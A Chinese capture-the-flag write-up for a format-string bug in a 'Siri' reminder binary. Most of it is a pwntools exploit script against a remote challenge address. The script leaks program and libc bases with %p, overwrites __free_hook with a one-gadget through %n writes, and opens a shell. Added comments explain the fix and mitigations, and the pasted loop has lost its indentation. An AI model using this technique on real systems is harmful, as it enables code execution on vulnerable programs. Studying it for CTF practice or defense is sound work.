漏洞点在sub_1212函数,printf(%s)造成格式化漏洞
思路是先通过格式化漏洞打印出程序基址和LIBC基址,然后修改free_hook为onegadget,再打印大量数据即可
最终的exp如下:
#coding:utf8
# CTF exploit script (pwntools, Python 2 string API) for the format-string bug
# the writeup describes: user input is passed to printf as the *format* argument.
# Root cause / defender notes: the fix in the target program is to print the
# reminder with a constant format (e.g. printf("%s", buf)); compiling with
# -Wformat -Wformat-security flags the call, and _FORTIFY_SOURCE=2 rejects
# "%n" in non-constant format strings, which would stop the write stage below.
# NOTE(review): this script is written for Python 2 (str-based pwntools API);
# under Python 3 p64(...)[i] is already an int, so ord() on it would raise.
from pwn import *
#context.log_level = "debug"
x=0   # assigned but never read in the visible code
# Retry loop; the unconditional break at the end exits after one pass.
# NOTE(review): the loop body below is not indented in the page as shown --
# indentation was presumably lost when the listing was pasted.
while(1):
# p = process("./Siri")
p = remote('123.56.170.202', 12124)
p.recvuntil(">>> ")
p.sendline("Hey Siri!")
p.recvuntil("What Can I do for you?")
# Stage 1: leak. The reminder text is echoed back through printf, so positional
# "%N$p" specifiers print stack slots; "%1$p" is taken as a program pointer.
p.sendline("Remind me to %1$p,%2$p,%3$p,%4$p,%5$p,")
p.recvuntil(">>> OK, I'll remind you to ")
buf=p.recvuntil(",(nil),(nil),")
# buf[2:-13] strips the "0x" prefix and the ",(nil),(nil)," trailer; the mask
# clears the low 12 bits (page alignment) and 0x2000 is a hardcoded offset of
# that pointer from the load base -- presumably taken from the target binary.
prog_base=int(buf[2:-13],16)&0xffffffffffff000-0x2000
log.info("prog_base @ 0x%x"%(prog_base))
p.sendline("Hey Siri!")
p.recvuntil("What Can I do for you?")
# Second leak: slot 83 is treated as a libc pointer (the author labels it
# __libc_start_main); buf[2:-14] also drops the trailing newline this time.
p.sendline("Remind me to %83$p,%2$p,%3$p,")
p.recvuntil(">>> OK, I'll remind you to ")
buf=p.recvuntil(",(nil),(nil),\n")
libc_base=(int(buf[2:-14],16)&0xffffffffffff000)-0x21000 # libc_start_main
# Hardcoded per-build libc offsets: the __free_hook symbol and the gadget the
# writeup calls "onegadget". __free_hook only exists in glibc < 2.34, so these
# constants are tied to one specific libc build -- verify against the target.
free_hook=libc_base+0x3ed8e8
gadget=libc_base+0x10a45c
log.info("libc_base @ 0x%x"%(libc_base))
log.info("free_hook @ 0x%x"%(free_hook))
log.info("gadget @ 0x%x"%(gadget))
# Stage 2: overwrite. Six iterations, one byte of the 48-bit gadget address
# per iteration, each written to free_hook+i via "%15$n" (the target address is
# appended after the format string; slot 15 presumably lands on it -- confirm).
# The "%03dx" padding sets printf's output count so that it equals the wanted
# byte mod 256; the -27 presumably compensates for the echoed prefix length.
for i in range(6):
p.sendline("Hey Siri!")
p.recvuntil("What Can I do for you?")
p.sendline("Remind me to %%%03dx%%15$nAAA"%((ord(p64(gadget)[i])-27+256)%256)+p64(free_hook+i))
p.recvuntil(">>> OK, I'll remind you to ")
p.sendline("Hey Siri!")
p.recvuntil("What Can I do for you?")
# Stage 3: trigger. Per the writeup, printing a large amount of output makes
# the program reach the overwritten hook; the mechanism is not visible here.
p.sendline("Remind me to %100000c")
p.interactive()
break